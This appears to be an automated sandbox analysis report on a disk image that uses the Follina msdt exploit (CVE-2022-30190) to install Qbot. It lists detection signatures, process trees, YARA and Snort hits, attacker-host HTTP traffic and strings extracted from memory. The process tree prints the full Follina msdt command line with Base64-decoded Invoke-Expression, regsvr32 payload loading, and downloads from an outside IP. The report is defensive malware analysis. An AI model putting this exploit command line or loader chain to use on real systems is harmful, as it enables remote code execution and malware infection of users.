
Windows Analysis Report
68101181_048154.img

Overview

General Information

Sample Name: 68101181_048154.img
Analysis ID: 640918
MD5: a623c3499f992a05c4ee5b9b2d3858f8
SHA1: ade8126beb9690929fd253686534b77a97ab4c44
SHA256: c77c63b0ad713ca97776305af4b22cd934271fec00f3c8029bdbbfcf8cd1ed98

Detection

CryptOne, Follina CVE-2022-30190, Qbot
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Yara detected CryptOne packer
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains capabilities to detect virtual machines
Spawns drivers
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 5248 cmdline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6088 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • udfs.sys (PID: 4 cmdline: MD5: 6A442723D4D05D9F15D24C9942CDA00D)
  • WINWORD.EXE (PID: 2896 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "E:\doc276.docx" /o "" MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 3532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 1476 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 6148 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • explorer.exe (PID: 6656 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • csc.exe (PID: 7084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline" MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 7100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 7116 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline" MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 6408 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
  • regsvr32.exe (PID: 6356 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
  • regsvr32.exe (PID: 6300 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
  • csc.exe (PID: 6896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline" MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6492 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
  • 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
  • 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
  • 0x1447:$re1: location.href = "ms-msdt:
(1 further entry not shown)

Source | Rule | Description | Author | Strings
00000013.00000002.807689748.0000000003340000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
  • 0x2920:$sa1: msdt.exe
  • 0x29ee:$sb2: IT_BrowseForFile=
00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security
00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000026.00000002.580482048.0000000004990000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000026.00000002.580575177.00000000049B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
(14 further entries not shown)

Source | Rule | Description | Author | Strings
38.2.regsvr32.exe.12b0184.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
24.2.explorer.exe.8b0000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
39.2.regsvr32.exe.4a50184.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
24.2.explorer.exe.8b0000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
40.2.regsvr32.exe.47f0000.2.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
(17 further entries not shown)
No Sigma rule has matched

Snort IDS alert:
Timestamp: 06/07/22-19:21:17.785538
Source IP: 185.234.247.119
Destination IP: 192.168.2.4
Source Port: 80
Destination Port: 49762
SID: 2036726
Protocol: TCP
Classtype: Attempted User Privilege Gain

Source: 39.2.regsvr32.exe.4a80000.2.raw.unpack | Malware Configuration Extractor: Qbot {"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": [...]}

Exploits

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: amstream.pdb | source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: amstream.pdbGCTL | source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_008BBCFC FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_049BBCFC FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 39_2_04AABCFC FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 40_2_0481BCFC FindFirstFileW,FindNextFileW,

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe

Networking

Source: Traffic | Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.4:49762
Source: Joe Sandbox View | ASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 07 Jun 2022 17:22:39 GMT
  Content-Type: application/octet-stream
  Content-Length: 1437696
  Connection: keep-alive
  Accept-Ranges: bytes
  Expires: 0
  Cache-Control: no-cache, no-store, must-revalidate
  Content-Disposition: attachment;
  Data Raw: (raw response body omitted)
Source: global traffic | HTTP traffic detected:
  GET /123.RES HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: 185.234.247.119
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /123.RES HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: 185.234.247.119
  If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
  If-None-Match: "6299dd5d-1861"
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /1240405476.dat HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
  Host: 185.234.247.119
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.247.119 (reported 50 times)
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/vr$
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/soap/http
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000002.579610608.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000002.580321314.0000000000907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types$r
                          Source: regsvr32.exe, 00000028.00000002.580138972.00000000007D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types7r
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesAr1
                          Source: 68101181_048154.imgString found in binary or memory: http://www.borland.com/namespaces/TypesU
                          Source: 68101181_048154.imgString found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typeskr
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.aadrm.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.aadrm.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.cortana.ai
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.office.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.onedrive.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://augloop.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://augloop.office.com/v2
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://cdn.entity.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://clients.config.office.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://config.edge.skype.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://cortana.ai
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://cortana.ai/api
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://cr.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://dev.cortana.ai
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://devnull.onenote.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://directory.services.
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://graph.windows.net
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://graph.windows.net/
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
